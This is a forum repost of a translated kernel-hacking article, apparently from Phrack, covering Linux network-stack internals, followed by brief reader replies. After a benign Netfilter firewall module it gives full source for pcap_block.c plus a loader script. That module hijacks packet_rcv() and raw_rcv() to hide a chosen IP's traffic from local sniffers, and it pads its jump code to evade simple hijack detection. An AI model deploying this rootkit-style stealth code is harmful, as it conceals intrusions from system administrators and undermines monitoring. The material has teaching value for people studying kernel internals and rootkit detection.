  230. /*
  231. * File operations functions for control device
  232. */
  233. static int lwfw_ioctl(struct inode *inode, struct file *file,
  234.               unsigned int cmd, unsigned long arg)
  235. {
  236.    int ret = 0;
  237.    
  238.    switch (cmd) {
  239.     case LWFW_GET_VERS:
  240.       return LWFW_VERS;
  241.     case LWFW_ACTIVATE: {
  242.        active = 1;
  243.        printk("LWFW: Activated.\n");
  244.        if (!deny_if && !deny_ip && !deny_port) {
  245.       printk("LWFW: No deny options set.\n");
  246.        }
  247.        break;
  248.     }
  249.     case LWFW_DEACTIVATE: {
  250.        active ^= active;
  251.        printk("LWFW: Deactivated.\n");
  252.        break;
  253.     }
  254.     case LWFW_GET_STATS: {
  255.        ret = copy_stats((struct lwfw_stats *)arg);
  256.        break;
  257.     }
  258.     case LWFW_DENY_IF: {
  259.        ret = set_if_rule((char *)arg);
  260.        break;
  261.     }
  262.     case LWFW_DENY_IP: {
  263.        ret = set_ip_rule((unsigned int)arg);
  264.        break;
  265.     }
  266.     case LWFW_DENY_PORT: {
  267.        ret = set_port_rule((unsigned short)arg);
  268.        break;
  269.     }
  270.     default:
  271.       ret = -EBADRQC;
  272.    };
  273.    
  274.    return ret;
  275. }

  276. /* Called whenever open() is called on the device file */
  277. static int lwfw_open(struct inode *inode, struct file *file)
  278. {
  279.    if (lwfw_ctrl_in_use) {
  280.       return -EBUSY;
  281.    } else {
  282.       MOD_INC_USE_COUNT;
  283.       lwfw_ctrl_in_use++;
  284.       return 0;
  285.    }
  286.    return 0;
  287. }

  288. /* Called whenever close() is called on the device file */
  289. static int lwfw_release(struct inode *inode, struct file *file)
  290. {
  291.    lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;
  292.    MOD_DEC_USE_COUNT;
  293.    return 0;
  294. }

  295. /*********************************************/
  296. /*
  297. * Module initialisation and cleanup follow...
  298. */
  299. int init_module()
  300. {
  301.    /* Register the control device, /dev/lwfw */
  302.       SET_MODULE_OWNER(&lwfw_fops);
  303.    
  304.    /* Attempt to register the LWFW control device */
  305.    if ((major = register_chrdev(LWFW_MAJOR, LWFW_NAME,
  306.                 &lwfw_fops)) < 0) {
  307.       printk("LWFW: Failed registering control device!\n");
  308.       printk("LWFW: Module installation aborted.\n");
  309.       return major;
  310.    }
  311.    
  312.    /* Make sure the usage marker for the control device is cleared */
  313.    lwfw_ctrl_in_use ^= lwfw_ctrl_in_use;

  314.    printk("\nLWFW: Control device successfully registered.\n");
  315.    
  316.    /* Now register the network hooks */
  317.    nfkiller.hook = lwfw_hookfn;
  318.    nfkiller.hooknum = NF_IP_PRE_ROUTING;   /* First stage hook */
  319.    nfkiller.pf = PF_INET;               /* IPV4 protocol hook */
  320.    nfkiller.priority = NF_IP_PRI_FIRST;    /* Hook to come first */
  321.    
  322.    /* And register... */
  323.    nf_register_hook(&nfkiller);
  324.    
  325.    printk("LWFW: Network hooks successfully installed.\n");
  326.    
  327.    printk("LWFW: Module installation successful.\n");
  328.    return 0;
  329. }

  330. void cleanup_module()
  331. {
  332.    int ret;
  333.    
  334.    /* Remove IPV4 hook */
  335.    nf_unregister_hook(&nfkiller);

  336.    /* Now unregister control device */
  337.    if ((ret = unregister_chrdev(LWFW_MAJOR, LWFW_NAME)) != 0) {
  338.       printk("LWFW: Removal of module failed!\n");
  339.    }

  340.    /* If anything was allocated for the deny rules, free it here */
  341.    if (deny_if)
  342.      kfree(deny_if);
  343.    
  344.    printk("LWFW: Removal of module successful.\n");
  345. }
  346. <-->;
复制代码



----[ A.3 - 头文件 : lwfw.h

  1. <++>; lwfw/lwfw.h
  2. /* Include file for the Light-weight Fire Wall LKM.
  3. *
  4. * A very simple Netfilter module that drops backets based on either
  5. * their incoming interface or source IP address.
  6. *
  7. * Written by bioforge  -  March 2003
  8. */

  9. #ifndef __LWFW_INCLUDE__
  10. # define __LWFW_INCLUDE__

  11. /* NOTE: The LWFW_MAJOR symbol is only made available for kernel code.
  12. * Userspace code has no business knowing about it. */
  13. # define LWFW_NAME        "lwfw"

  14. /* Version of LWFW */
  15. # define LWFW_VERS        0x0001       /* 0.1 */

  16. /* Definition of the LWFW_TALKATIVE symbol controls whether LWFW will
  17. * print anything with printk(). This is included for debugging purposes.
  18. */
  19. #define LWFW_TALKATIVE

  20. /* These are the IOCTL codes used for the control device */
  21. #define LWFW_CTRL_SET   0xFEED0000     /* The 0xFEED... prefix is arbitrary */
  22. #define LWFW_GET_VERS   0xFEED0001     /* Get the version of LWFM */
  23. #define LWFW_ACTIVATE   0xFEED0002
  24. #define LWFW_DEACTIVATE 0xFEED0003
  25. #define LWFW_GET_STATS  0xFEED0004
  26. #define LWFW_DENY_IF    0xFEED0005
  27. #define LWFW_DENY_IP    0xFEED0006
  28. #define LWFW_DENY_PORT  0xFEED0007

  29. /* Control flags/Options */
  30. #define LWFW_IF_DENY_ACTIVE   0x00000001
  31. #define LWFW_IP_DENY_ACTIVE   0x00000002
  32. #define LWFW_PORT_DENY_ACTIVE 0x00000004

  33. /* Statistics structure for LWFW.
  34. * Note that whenever a rule's condition is changed the related
  35. * xxx_dropped field is reset.
  36. */
  37. struct lwfw_stats {
  38.    unsigned int if_dropped;           /* Packets dropped by interface rule */
  39.    unsigned int ip_dropped;           /* Packets dropped by IP addr. rule */
  40.    unsigned int tcp_dropped;           /* Packets dropped by TCP port rule */
  41.    unsigned long total_dropped;   /* Total packets dropped */
  42.    unsigned long total_seen;      /* Total packets seen by filter */
  43. };

  44. /*
  45. * From here on is used solely for the actual kernel module
  46. */
  47. #ifdef __KERNEL__
  48. # define LWFW_MAJOR       241   /* This exists in the experimental range */

  49. /* This macro is used to prevent dereferencing of NULL pointers. If
  50. * a pointer argument is NULL, this will return -EINVAL */
  51. #define NULL_CHECK(ptr)    \
  52.    if ((ptr) == NULL)  return -EINVAL

  53. /* Macros for accessing options */
  54. #define DENY_IF_ACTIVE    (lwfw_options & LWFW_IF_DENY_ACTIVE)
  55. #define DENY_IP_ACTIVE    (lwfw_options & LWFW_IP_DENY_ACTIVE)
  56. #define DENY_PORT_ACTIVE  (lwfw_options & LWFW_PORT_DENY_ACTIVE)

  57. #endif                       /* __KERNEL__ */
  58. #endif
  59. <-->;

  60. <++>; lwfw/Makefile
  61. CC= egcs
  62. CFLAGS= -Wall -O2
  63. OBJS= lwfw.o

  64. .c.o:
  65.     $(CC) -c $< -o $@ $(CFLAGS)

  66. all: $(OBJS)

  67. clean:
  68.     rm -rf *.o
  69.     rm -rf ./*~
  70. <-->;
复制代码


--[ B - 第6节中的源代码

    这里给出的是一个劫持packet_rcv()和raw_rcv()函数以隐藏来自或去往我们指定的IP地址的数据包的简单模块。默认的IP地址被设置为127.0.0.1,但是可以通过改变#define IP的值来改变它。还有一个bash脚本,用于从System.map文件中获取需要的函数的入口地址,并且以需要的格式将这些地址做为参数来运行insmod命令。这个加载脚本是grem所写。原用于我的Mod-off项目,很容易修改它使之适用于这里给出的模块。再次感谢 grem。
   
    给出的模块仅是一个原理性的代码,没有使用任何模块隐藏的方法。切记,虽然该模块将通信从本机的嗅探器中隐藏,但是位于同一局域网的另一台主机上的嗅探器仍然能看到这些数据包。从该模块中所列出的内容出发,聪明的读者可以找到所有在设计一个阻塞任何种类的数据包的过滤函数时所需的东西。我已经成功的将本文提及的技术用于隐藏我的Linux核心模块项目中用到的控制和信息获取数据包。

   
  1. <++>; pcaphide/pcap_block.c
  2. /* Kernel hack that will hijack the packet_rcv() function
  3. * which is used to pass packets to  Libpcap applications
  4. * that use  PACKET sockets.  Also  hijacks the raw_rcv()
  5. * function. This is used to pass packets to applications
  6. * that open RAW sockets.
  7. *
  8. * Written by bioforge  -  30th June, 2003
  9. */

  10. #define MODULE
  11. #define __KERNEL__

  12. #include <linux/config.h>;
  13. #include <linux/module.h>;
  14. #include <linux/kernel.h>;
  15. #include <linux/netdevice.h>;
  16. #include <linux/skbuff.h>;
  17. #include <linux/smp_lock.h>;
  18. #include <linux/ip.h>;               /* For struct ip */
  19. #include <linux/if_ether.h>;           /* For ETH_P_IP */

  20. #include <asm/page.h>;               /* For PAGE_OFFSET */

  21. /*
  22. * IP address to hide 127.0.0.1 in NBO for Intel */
  23. #define IP    htonl(0x7F000001)

  24. /* Function pointer for original packet_rcv() */
  25. static int (*pr)(struct sk_buff *skb, struct net_device *dev,
  26.           struct packet_type *pt);
  27. MODULE_PARM(pr, "i");       /* Retrieved as insmod parameter */

  28. /* Function pointer for original raw_rcv() */
  29. static int (*rr)(struct sock *sk, struct sk_buff *skb);
  30. MODULE_PARM(rr, "i");

  31. /* Spinlock used for the parts where we un/hijack packet_rcv() */
  32. static spinlock_t hijack_lock  = SPIN_LOCK_UNLOCKED;

  33. /* Helper macros for use with the Hijack spinlock */
  34. #define HIJACK_LOCK    spin_lock_irqsave(&hijack_lock, \
  35.                          sl_flags)
  36. #define HIJACK_UNLOCK  spin_unlock_irqrestore(&hijack_lock, \
  37.                           sl_flags)

  38. #define CODESIZE 10
  39. /* Original and hijack code buffers.
  40. * Note that the hijack code also provides 3 additional
  41. * bytes ( inc eax;  nop;  dec eax ) to try and throw
  42. * simple hijack detection techniques that just look for
  43. * a move and a jump. */
  44. /* For packet_rcv() */
  45. static unsigned char pr_code[CODESIZE] = "\xb8\x00\x00\x00\x00"
  46.                                       "\x40\x90\x48"
  47.                                       "\xff\xe0";
  48. static unsigned char pr_orig[CODESIZE];

  49. /* For raw_rcv() */
  50. static unsigned char rr_code[CODESIZE] = "\xb8\x00\x00\x00\x00"
  51.                                       "\x40\x90\x48"
  52.                                       "\xff\xe0";
  53. static unsigned char rr_orig[CODESIZE];

  54. /* Replacement for packet_rcv(). This is currently setup to hide
  55. * all packets with a source or destination IP address that we
  56. * specify. */
  57. int hacked_pr(struct sk_buff *skb, struct net_device *dev,
  58.            struct packet_type *pt)
  59. {
  60.     int sl_flags;               /* Flags for spinlock */
  61.     int retval;

  62.     /* Check if this is an IP packet going to or coming from our
  63.      * hidden IP address. */
  64.     if (skb->;protocol == htons(ETH_P_IP))   /* IP packet */
  65.       if (skb->;nh.iph->;saddr == IP || skb->;nh.iph->;daddr == IP)
  66.     return 0;            /* Ignore this packet */
  67.    
  68.     /* Call original */
  69.     HIJACK_LOCK;
  70.     memcpy((char *)pr, pr_orig, CODESIZE);
  71.     retval = pr(skb, dev, pt);
  72.     memcpy((char *)pr, pr_code, CODESIZE);
  73.     HIJACK_UNLOCK;

  74.     return retval;
  75. }

  76. /* Replacement for raw_rcv(). This is currently setup to hide
  77. * all packets with a source or destination IP address that we
  78. * specify. */
  79. int hacked_rr(struct sock *sock, struct sk_buff *skb)
  80. {
  81.     int sl_flags;               /* Flags for spinlock */
  82.     int retval;

  83.     /* Check if this is an IP packet going to or coming from our
  84.      * hidden IP address. */
  85.     if (skb->;protocol == htons(ETH_P_IP))   /* IP packet */
  86.       if (skb->;nh.iph->;saddr == IP || skb->;nh.iph->;daddr == IP)
  87.     return 0;            /* Ignore this packet */
  88.    
  89.     /* Call original */
  90.     HIJACK_LOCK;
  91.     memcpy((char *)rr, rr_orig, CODESIZE);
  92.     retval = rr(sock, skb);
  93.     memcpy((char *)rr, rr_code, CODESIZE);
  94.     HIJACK_UNLOCK;

  95.     return retval;
  96. }

  97. int init_module()
  98. {
  99.     int sl_flags;               /* Flags for spinlock */
  100.    
  101.     /* pr & rr set as module parameters. If zero or < PAGE_OFFSET
  102.      * (which we treat as the lower bound of kernel memory), then
  103.      * we will not install the hacks. */
  104.     if ((unsigned int)pr == 0 || (unsigned int)pr < PAGE_OFFSET) {
  105.     printk("Address for packet_rcv() not valid! (%08x)\n",
  106.            (int)pr);
  107.     return -1;
  108.     }
  109.     if ((unsigned int)rr == 0 || (unsigned int)rr < PAGE_OFFSET) {
  110.     printk("Address for raw_rcv() not valid! (%08x)\n",
  111.            (int)rr);
  112.     return -1;
  113.     }
  114.          
  115.     *(unsigned int *)(pr_code + 1) = (unsigned int)hacked_pr;
  116.     *(unsigned int *)(rr_code + 1) = (unsigned int)hacked_rr;
  117.    
  118.     HIJACK_LOCK;
  119.     memcpy(pr_orig, (char *)pr, CODESIZE);
  120.     memcpy((char *)pr, pr_code, CODESIZE);
  121.     memcpy(rr_orig, (char *)rr, CODESIZE);
  122.     memcpy((char *)rr, rr_code, CODESIZE);
  123.     HIJACK_UNLOCK;
  124.    
  125.     EXPORT_NO_SYMBOLS;
  126.    
  127.     return 0;
  128. }

  129. void cleanup_module()
  130. {
  131.     int sl_flags;
  132.    
  133.     lock_kernel();
  134.    
  135.     HIJACK_LOCK;
  136.     memcpy((char *)pr, pr_orig, CODESIZE);
  137.     memcpy((char *)rr, rr_orig, CODESIZE);
  138.     HIJACK_UNLOCK;
  139.    
  140.     unlock_kernel();
  141. }
  142. <-->;

  143. <++>; pcaphide/loader.sh
  144. #!/bin/sh
  145. #  Written by  grem, 30th June 2003
  146. #  Hacked by bioforge, 30th June 2003

  147. if [ "$1" = "" ]; then
  148.         echo "Use: $0 <System.map>;";
  149.         exit;
  150. fi

  151. MAP="$1"
  152. PR=`cat $MAP | grep -w "packet_rcv" | cut -c 1-16`
  153. RR=`cat $MAP | grep -w "raw_rcv" | cut -c 1-16`

  154. if [ "$PR" = "" ]; then
  155.         PR="00000000"
  156. fi
  157. if [ "$RR" = "" ]; then
  158.         RR="00000000"
  159. fi

  160. echo "insmod pcap_block.o pr=0x$PR rr=0x$RR"

  161. # Now do the actual call to insmod
  162. insmod pcap_block.o pr=0x$PR rr=0x$RR
  163. <-->;

  164. <++>; pcaphide/Makefile
  165. CC= gcc
  166. CFLAGS= -Wall -O2 -fomit-frame-pointer
  167. INCLUDES= -I/usr/src/linux/include
  168. OBJS= pcap_block.o

  169. .c.o:
  170.     $(CC) -c $< -o $@ $(CFLAGS) $(INCLUDES)

  171. all: $(OBJS)

  172. clean:
  173.     rm -rf *.o
  174.     rm -rf ./*~
  175. <-->;
复制代码



------[ 参考文献

该附录包含写本文过程中用到的参考文献的列表。

[1]  The tcpdump group
      http://www.tcpdump.org
[2]  The Packet Factory
      http://www.packetfactory.net
[3]  My network tools page -
      http://uqconnect.net/~zzoklan/software/#net_tools
[4]  Silvio Cesare's Kernel Function Hijacking article
      http://vx.netlux.org/lib/vsc08.html
[5]  Man pages for:
    - raw (7)
    - packet (7)
    - tcpdump (1)
[6]  Linux kernel source files. In particular:
    - net/packet/af_packet.c     (for  packet_rcv())
    - net/ipv4/raw.c             (for  raw_rcv())
    - net/core/dev.c
    - net/ipv4/netfilter/*
[7] Harald Welte's Journey of a packet through the Linux 2.4 network
     stack
     http://gnumonks.org/ftp/pub/doc/packet-journey-2.4.html
[8] The Netfilter documentation page
     http://www.netfilter.org/documentation
[9] Phrack 55 - File 12 -
     http://www.phrack.org/show.php?p=55&a=12
[A] Linux Device Drivers 2nd Ed. by Alessandro Rubini et al.
[B] Inside the Linux Packet Filter. A Linux Journal article
     http://www.linuxjournal.com/article.php?sid=4852


|=[ EOF ]=---------------------------------------------------------------=|

论坛徽章:
0
3 [报告]
发表于 2004-02-20 17:47 |只看该作者

深入Linux网络核心堆栈!

感谢斑竹!

论坛徽章:
0
4 [报告]
发表于 2007-01-02 16:03 |只看该作者
mark 收藏

论坛徽章:
0
5 [报告]
发表于 2007-01-02 18:15 |只看该作者
也收藏起来!慢慢看。

论坛徽章:
0
6 [报告]
发表于 2007-01-02 18:48 |只看该作者
恩,这个翻译的比较全
收藏

论坛徽章:
0
7 [报告]
发表于 2007-01-02 22:48 |只看该作者
以前就看过,写的不错

论坛徽章:
0
8 [报告]
发表于 2007-01-03 10:48 |只看该作者
对大家编程有一定的提高,顶一下

论坛徽章:
0
9 [报告]
发表于 2007-01-04 03:04 |只看该作者
看标题似乎是phrack杂志的文章?

论坛徽章:
0
10 [报告]
发表于 2007-01-20 21:35 |只看该作者
看到我晕!!!水平有限啊,痛苦;(
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP